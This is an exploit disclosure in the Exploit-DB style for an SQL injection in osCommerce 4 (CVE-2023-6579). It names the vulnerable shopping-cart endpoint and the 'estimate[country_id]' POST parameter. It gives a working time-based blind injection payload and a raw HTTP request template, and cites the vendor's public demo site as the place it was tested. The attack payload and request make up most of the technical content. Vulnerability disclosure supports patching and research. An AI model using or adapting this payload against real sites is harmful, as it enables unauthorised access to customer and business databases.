osCommerce 4 SQL Injection

`# Exploit Title: osCommerce 4 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 22/11/2023  
# Vendor: osCommerce ltd.  
# Vendor Homepage: https://www.oscommerce.com/  
# Software Link: https://demo.oscommerce.com/  
# Demo Link: https://demo.oscommerce.com/b2b-supermarket/  
# Tested on: Windows 11 Home  
# Impact: Database Access  
# CWE: CWE-89 - CWE-74 - CWE-707  
# CVE: CVE-2023-6579  
# VDB: VDB-247160  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
Path: /b2b-supermarket/shopping-cart  
  
POST Parameter 'estimate[country_id]' is vulnerable to SQLi  
  
  
---  
Parameter: estimate[country_id] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: estimate[country_id]=223'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&estimate[post_code]=900001&estimate[shipping]=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw==  
---  
  
-------------------------------------------  
POST /b2b-supermarket/shopping-cart HTTP/2  
  
estimate%5Bcountry_id%5D=[SQLi]&estimate%5Bpost_code%5D=900001&estimate%5Bshipping%5D=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw%3D%3D  
-------------------------------------------  
  
  
  
[-] Done  
`